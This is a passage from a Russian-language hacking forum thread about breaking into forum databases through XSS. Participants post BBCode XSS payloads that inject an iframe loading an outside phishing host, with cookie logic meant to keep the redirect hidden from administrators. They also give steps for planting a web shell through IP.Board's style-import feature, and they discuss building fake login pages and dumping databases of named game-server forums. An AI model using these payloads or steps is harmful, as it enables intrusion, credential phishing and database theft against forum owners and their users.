Регистрация Главная Сообщество
Сообщения за день Справка Регистрация

Взлом БД через форум с xss

-

Базы серверов и брут

- Все, что связано с брутом и работой с базами данных

Закрытая тема
 
Опции темы
Старый 08.06.2010, 18:24   #61
 Пехотинец
Аватар для gladvoz
 
gladvoz скоро будет известенgladvoz скоро будет известенgladvoz скоро будет известен
Регистрация: 10.10.2009
Сообщений: 87
Популярность: 278
Сказал(а) спасибо: 120
Поблагодарили 52 раз(а) в 34 сообщениях
Отправить сообщение для gladvoz с помощью ICQ Отправить сообщение для gladvoz с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

делаю фейк, заливаю на хостинг. и в место слов получается вот это
[Ссылки могут видеть только зарегистрированные пользователи. ]
 
Старый 08.06.2010, 18:29   #62
Заблокирован
 Пехотинец
Аватар для fesssi
 
fesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известен
Регистрация: 14.11.2009
Сообщений: 64
Популярность: 425
Сказал(а) спасибо: 35
Поблагодарили 134 раз(а) в 56 сообщениях
Отправить сообщение для fesssi с помощью ICQ Отправить сообщение для fesssi с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Вопрос: Программа создала фейк но там не понятна кодировка, всякие квадратики и т.д
Ответ: В программе, внизу где 'Дополнительная замена строк'
Введите в поле 'C' => charset=utf-8
Введите в поле 'На' => charset=windows-1251

Все описано тут:http://zhyk.ru/forum/showthread.php?t=79105 ©m0nk
 
Пользователь сказал cпасибо:
gladvoz (08.06.2010)
Старый 08.06.2010, 18:37   #63
༼ ᕤ◕◡◕ ༽ᕤ
 Капитан
Аватар для Chipito
 
Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(
Регистрация: 09.12.2009
Сообщений: 256
Популярность: 20088
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 181
Поблагодарили 681 раз(а) в 251 сообщениях
Отправить сообщение для Chipito с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изначально.

Шелл будет доступен в директории
[Ссылки могут видеть только зарегистрированные пользователи. ]
(С) Ачат c0m
Вот сами два файла:
[Ссылки могут видеть только зарегистрированные пользователи. ] (images)
[Ссылки могут видеть только зарегистрированные пользователи. ] (styles)
ЗЫ Отчет с вирустотала архивов не делал=) т.к. их можна даже не открывать у себя на машине.
________________
 
Старый 08.06.2010, 18:52   #64
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Chipito если не ошибаюсь это для 3 версии, и самый сложный способ т.к. нужно качать денвер + сам движок форума устанавливать и т.д. Через аватар or sql и настройки легче
 
Старый 08.06.2010, 18:54   #65
༼ ᕤ◕◡◕ ༽ᕤ
 Капитан
Аватар для Chipito
 
Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(
Регистрация: 09.12.2009
Сообщений: 256
Популярность: 20088
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 181
Поблагодарили 681 раз(а) в 251 сообщениях
Отправить сообщение для Chipito с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от m0nkПосмотреть сообщение
Chipito если не ошибаюсь это для 3 версии, и самый сложный способ т.к. нужно качать денвер + сам движок форума устанавливать и т.д. Через аватар or sql и настройки легче

Оо какой денвер и движок?
Заходим в админку,заливаем стили,потом настройки стилей,смотрим директорию с изображениями и все=)
Да и подходит он к любой версии,вспомни видео,как сливали базу l2europe.net
________________
 
2 пользователя(ей) сказали cпасибо:
fesssi (08.06.2010), TakeToTheSkies (12.06.2010)
Старый 09.06.2010, 12:56   #66
 Разведчик
Аватар для Me$$iah
 
Me$$iah никому не известный тип
Регистрация: 09.06.2010
Сообщений: 7
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
Exclamation Re: Взлом БД через форум с xss

Почему первый скрипт (без куки) переходит сразу на фейк при загрузке подписи с любого браузера, а скрипт с кукисами вообще не работает? В чём разница кроме сохранения кукисов?
Цитата:
[acronym=[acronym= style=background:url('//') onerror=document.write("\x3C******\x20src=h&# x74;tp://la&#x3 2;crystal. hx0.ru/\x20fram eborder=0\x20width=100%\x20height=100%\x20scrollin g=no\x3E\x3C/******\x3E");document.close(); ]][/acronym][/acronym]
[/acronym][/acronym][/size]

Цитата:
[acronym=[acronym= style=background:url('//') onerror= lol="if(document.cookie.indexOf(\x22ipb_my\x22)==-1){with(valid_until=new\x20Date())setTime(getTime( )+30*24*60*60*1000);document.cookie=\x22ipb_my=123 6;\x20expires=\x22+valid_until.toGMTString();docum ent.write(\x22\x3C******\x20src=htt p://la2c&# x72;ystal.h&#x7 8;0.ru/\x20frameborder=0\ x20width=100%\x20height=100%\x20scrolling=no\x3E\x 3C/******\x3E\x22);document.close()}";eval(lol); ]][/acronym][/acronym]

 
Старый 09.06.2010, 13:29   #67
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от ChipitoПосмотреть сообщение
Оо какой денвер и движок?
Заходим в админку,заливаем стили,потом настройки стилей,смотрим директорию с изображениями и все=)
Да и подходит он к любой версии,вспомни видео,как сливали базу l2europe.net

Извеняюсь до конца сообщение не прочитал, просто вот эти файлы [Ссылки могут видеть только зарегистрированные пользователи. ] (images)
[Ссылки могут видеть только зарегистрированные пользователи. ] (styles) делали через денвер + движок)


Цитата:
Сообщение от Me$$iahПосмотреть сообщение
Почему первый скрипт (без куки) переходит сразу на фейк при загрузке подписи с любого браузера, а скрипт с кукисами вообще не работает? В чём разница кроме сохранения кукисов?




Скрипт с куками работает, тебя переадресовывает один раз, при следующем разе не переадресует т.к. записалась кука ipb=1234 и пока ты куки не почистишь тебя переадресовывать не будет, это сделано для того чтоб не палиться. Как админ сможет прочитать твое лс если его будет перекидывать на фейк все время, он впалит сразу.
 
Старый 09.06.2010, 15:40   #68
 Разведчик
Аватар для LastHero
 
LastHero скоро будет известенLastHero скоро будет известенLastHero скоро будет известен
Регистрация: 31.05.2009
Сообщений: 49
Популярность: 215
Сказал(а) спасибо: 41
Поблагодарили 96 раз(а) в 22 сообщениях
Отправить сообщение для LastHero с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

m0nk ссылка как исправить потерта,хотелось бы узнать тут или в лс
 
Старый 09.06.2010, 15:41   #69
Заблокирован
 Пехотинец
Аватар для fesssi
 
fesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известенfesssi скоро будет известен
Регистрация: 14.11.2009
Сообщений: 64
Популярность: 425
Сказал(а) спасибо: 35
Поблагодарили 134 раз(а) в 56 сообщениях
Отправить сообщение для fesssi с помощью ICQ Отправить сообщение для fesssi с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от (c)FunПосмотреть сообщение
forum.la2mega.com
у вас фейк нормально делается? потому что когда я сделал фейк,он почти голый без оформления.

Была похожая лажа форум уже непомню... Но переделал так сделал дубликат фарума на локольную тачку например прогой Телепорт)
Потом закинул файлы с картинками на хостинг где фейк лежыт ну и переделал Индекс файл что бы он читал прямо с хостинга фейка картинки)
Мне лично помогло.
Удачи)
 
Старый 09.06.2010, 17:32   #70
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Как сделать фейк если скин другой?

И часто меня спрашивают как залить шелл?

Как слить бд через шелл?


И в конце концов

P.S.S За шелл спасибо Relikt'у

Последний раз редактировалось m0nk; 09.06.2010 в 17:41.
 
Старый 09.06.2010, 19:45   #71
Заблокирован
 Рыцарь
Аватар для m0nk
 
m0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компанииm0nk душа компании
Регистрация: 10.12.2009
Сообщений: 330
Популярность: 1099
Сказал(а) спасибо: 148
Поблагодарили 375 раз(а) в 108 сообщениях
Отправить сообщение для m0nk с помощью ICQ
 
По умолчанию Re: Взлом БД через форум с xss

Измени кодировку в блокноте, и поясни свой вопрос нормально)
 
Старый 09.06.2010, 19:55   #72
 Разведчик
Аватар для p.Number0ne
 
p.Number0ne никому не известный тип
Регистрация: 22.05.2010
Сообщений: 2
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

На компе норм открывается индекс а на компе а кода залил нефига

Добавлено через 6 минут
В блакноте не могу найти как изменить кодировку (((
________________
Помог ?Жми спосибку ) !
{ADM}{Number0ne}

Последний раз редактировалось p.Number0ne; 09.06.2010 в 20:02. Причина: Добавлено сообщение
 
Старый 09.06.2010, 20:24   #73
 Разведчик
Аватар для Me$$iah
 
Me$$iah никому не известный тип
Регистрация: 09.06.2010
Сообщений: 7
Популярность: 10
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

Цитата:
Сообщение от m0nkПосмотреть сообщение
Скрипт с куками работает, тебя переадресовывает один раз, при следующем разе не переадресует т.к. записалась кука ipb=1234 и пока ты куки не почистишь тебя переадресовывать не будет, это сделано для того чтоб не палиться. Как админ сможет прочитать твое лс если его будет перекидывать на фейк все время, он впалит сразу.

Это я понимаю. Я наверно не правильно выразился. Я имел ввиду то, что у меня ни в одном браузере не работает скрипт с автопереадресацией с куками (Когда переадресация идёт без участия мышки).

 
Старый 09.06.2010, 20:52   #74
 Разведчик
Аватар для fireridlle
 
fireridlle никому не известный тип
Регистрация: 05.04.2010
Сообщений: 25
Популярность: 16
Сказал(а) спасибо: 29
Поблагодарили 3 раз(а) в 3 сообщениях
 
По умолчанию Re: Взлом БД через форум с xss

почисть куки и переадресует или если ты искользовал первый скрипт то наведи мышку на подпись
 
Старый 10.06.2010, 00:01   #75
Заблокирован
 Капитан
Аватар для BlackWinG
 
BlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауруBlackWinG излучает ауру
Регистрация: 08.04.2010
Сообщений: 279
Популярность: 654
Сказал(а) спасибо: 126
Поблагодарили 277 раз(а) в 113 сообщениях
Отправить сообщение для BlackWinG с помощью ICQ Отправить сообщение для BlackWinG с помощью Skype™
 
По умолчанию Re: Взлом БД через форум с xss

Просто МБ на том ФОруме Фикс и там просто не пашет
 
Закрытая тема


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сервера через PHP Silence Треп 1 27.09.2010 20:41
Кража аккаунтов через форум (скрипт php) Razzor Подполье Lineage 2 (0 уровень) 1 01.08.2009 00:21

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 01:37.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net